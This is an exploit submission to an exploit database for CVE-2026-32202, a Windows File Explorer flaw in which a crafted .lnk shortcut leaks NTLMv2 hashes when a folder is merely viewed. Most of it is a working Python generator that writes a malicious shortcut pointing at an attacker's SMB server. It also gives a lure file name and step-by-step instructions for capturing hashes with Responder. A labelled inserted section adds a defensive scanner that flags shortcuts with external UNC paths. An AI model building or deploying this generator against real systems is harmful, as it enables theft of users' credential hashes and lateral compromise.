Microsoft Exploit, NTLMv2 Hash Capture

# Title: Microsoft - NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202

## Description:
A spoofing vulnerability in Windows Shell (File Explorer) allows an
attacker to capture NTLMv2 hashes without user interaction. By crafting a
malicious .lnk (shortcut) file with a UNC path pointing to an
attacker-controlled SMB server, the target's Windows system automatically
sends an NTLMv2 authentication request when the folder containing the .lnk
file is opened. No click on the shortcut is required – simply viewing the
folder triggers the vulnerability.

**CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (user only needs to open a folder)
**User Interaction**: None (zero-click)

**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025

**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)

STATUS: MEDIUM - HIGH/ Vulnerability

[+]Payload:

```
SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2
```
[+]Exploit:

```python
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""

import struct
import sys
import os

def create_malicious_lnk(attacker_ip, output_file="exploit.lnk", share_name="share"):
    """
    Creates LNK file with UNC path to attacker machine
    """

    unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
    unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'

    # LNK structure (standard + vulnerable component)
    lnk = bytearray()

    # ===== HEADER (76 bytes) =====
    lnk.extend(struct.pack('<I', 0x0000004C))  # HeaderSize
    # LinkCLSID: {00021401-0000-0000-C000-000000000046}
    lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
    lnk.extend(struct.pack('<I', 0x000002A3))  # LinkFlags (HasName|HasWorkingDir|HasArguments|IsUnicode)
    lnk.extend(struct.pack('<I', 0x00000080))  # FileAttributes (NORMAL)
    lnk.extend(struct.pack('<Q', 0))           # CreationTime
    lnk.extend(struct.pack('<Q', 0))           # AccessTime
    lnk.extend(struct.pack('<Q', 0))           # WriteTime
    lnk.extend(struct.pack('<I', 0x00001000))  # FileSize
    lnk.extend(struct.pack('<I', 0x00000000))  # IconIndex
    lnk.extend(struct.pack('<I', 0x00000001))  # ShowCommand (SW_NORMAL)
    lnk.extend(struct.pack('<H', 0x0000))      # Hotkey
    lnk.extend(b'\x00\x00')                    # Reserved
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved2
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved3

    # ===== IDLIST (activates when folder is opened) =====
    # Shell Folder IDITEM
    lnk.extend(b'\x14\x00')                    # ItemID size (20 bytes)
    lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
    lnk.extend(b'\x00\x00')                    # Terminating ID

    # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
    # NameString (UNC path - triggers NTLM hash leak)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)

    # ArgumentsString (empty)
    lnk.extend(b'\x00\x00')

    # WorkingDir (UNC path again)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)

    # ===== Console Properties (required for some Windows versions) =====
    lnk.extend(b'\x50\x00\x14\x00')           # dwWindowSize (80x20)
    lnk.extend(b'\x50\x00\xfa\x00')           # dwBufferSize (80x250)
    lnk.extend(b'\x00\x00\x00\x00')           # dwFontSize
    lnk.extend(b'\x00\x00\x00\x00')           # dwFontFamily
    lnk.extend(b'\x00\x00\x00\x00')           # dwFaceNameLen
    lnk.extend(b'\x00\x00\x00\x00')           # dwFaceNameOffset
    lnk.extend(b'\x00\x00\x00\x00')           # dwStyle
    # 64 bytes padding
    lnk.extend(b'\x00' * 64)

    # Save the file
    with open(output_file, 'wb') as f:
        f.write(lnk)

    return output_file, unc_path

def main():
    print(r"""
    ╔═══════════════════════════════════════════╗
    ║  CVE-2026-32202 - LNK Generator           ║
    ║  Author: nu11secur1ty                     ║
    ╚═══════════════════════════════════════════╝
    """)

    if len(sys.argv) < 2:
        print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP> [output_file]")
        print("Example: python3 cve_2026_32202_gen.py 192.168.1.100 invoice.lnk")
        sys.exit(1)

    attacker_ip = sys.argv[1]
    output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"

    lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)

    print(f"[+] Exploit ready!")
    print(f"[+] File: {lnk_file}")
    print(f"[+] UNC path: {unc_path}")
    print()
    print("[*] Next steps:")
    print(f"    1. Start Responder: sudo responder -I eth0 -v")
    print(f"    2. Transfer {lnk_file} to Windows 11 Desktop")
    print(f"    3. Open Desktop in File Explorer (no click required)")
    print(f"    4. Watch Responder - NTLM hash will appear")
    print()

    with open("start_responder.sh", "w") as f:
        f.write("#!/bin/bash\n")
        f.write("echo \"[+] Starting Responder...\"\n")
        f.write("sudo responder -I eth0 -v\n")
    os.chmod("start_responder.sh", 0o755)
    print("[+] Helper script created: start_responder.sh")

if __name__ == "__main__":
    main()
```
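
On the defensive side, the condition the description relies on (a shortcut whose stored path points at a remote SMB host) can be checked statically before a folder is browsed. The triage scanner below is an added example, not part of the original submission; the allowlist, host names and sample blobs are constructed assumptions.

```python
import re
import struct

# Shell Link header constants (MS-SHLLINK): HeaderSize and LinkCLSID.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# \\host\share, where host is a DNS name, NetBIOS name or IP literal.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._\-]{1,255})\\([^\\\x00-\x1f]{1,80})")


def is_shell_link(data: bytes) -> bool:
    """True when the blob starts with a Shell Link header."""
    if len(data) < HEADER_SIZE:
        return False
    (size,) = struct.unpack_from("<I", data, 0)
    return size == HEADER_SIZE and data[4:20] == LINK_CLSID


def unc_targets(data: bytes) -> set:
    """Return every (host, share) pair stored as ANSI or UTF-16LE text."""
    views = (
        data.decode("latin-1"),                         # ANSI strings
        data.decode("utf-16-le", errors="ignore"),      # UTF-16LE, even offset
        data[1:].decode("utf-16-le", errors="ignore"),  # UTF-16LE, odd offset
    )
    return {(h.lower(), s) for v in views for h, s in UNC_RE.findall(v)}


def external_unc_hosts(data: bytes, trusted: set) -> list:
    """Hosts a shortcut references that are not on the allowlist."""
    if not is_shell_link(data):
        return []
    return sorted({h for h, _ in unc_targets(data) if h not in trusted})


def _sample(path: str) -> bytes:
    # Constructed test blob: header fields plus one UTF-16LE string. It is
    # only enough structure for this scanner, not a usable shortcut.
    header = (struct.pack("<I", HEADER_SIZE) + LINK_CLSID).ljust(HEADER_SIZE, b"\x00")
    return header + path.encode("utf-16-le") + b"\x00\x00"


TRUSTED_HOSTS = {"fs01.corp.example"}  # assumed allowlist of internal servers
INTERNAL = _sample(r"\\fs01.corp.example\tools\setup.exe")
SUSPECT = _sample(r"\\203.0.113.10\share\test")  # TEST-NET-3 documentation address

if __name__ == "__main__":
    for name, blob in (("internal", INTERNAL), ("suspect", SUSPECT)):
        print(name, external_unc_hosts(blob, TRUSTED_HOSTS))
```

A hit is a triage signal rather than proof, since legitimate shortcuts to file servers also store UNC paths; the allowlist is what separates the two.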


Demo:
[href](https://www.patreon.com/posts/cve-2026-32202-159362448)

Code:
[code](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)

Time spent:
02:30:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/

On Wed, May 27, 2026 at 2:06 PM Offsec Exploits <
submit@offensive-security.com> wrote:

> Hello,
>
> Thank you for your submission.
> We will be checking it shortly.
>
> Regards
> - Exploit-DB Team
>

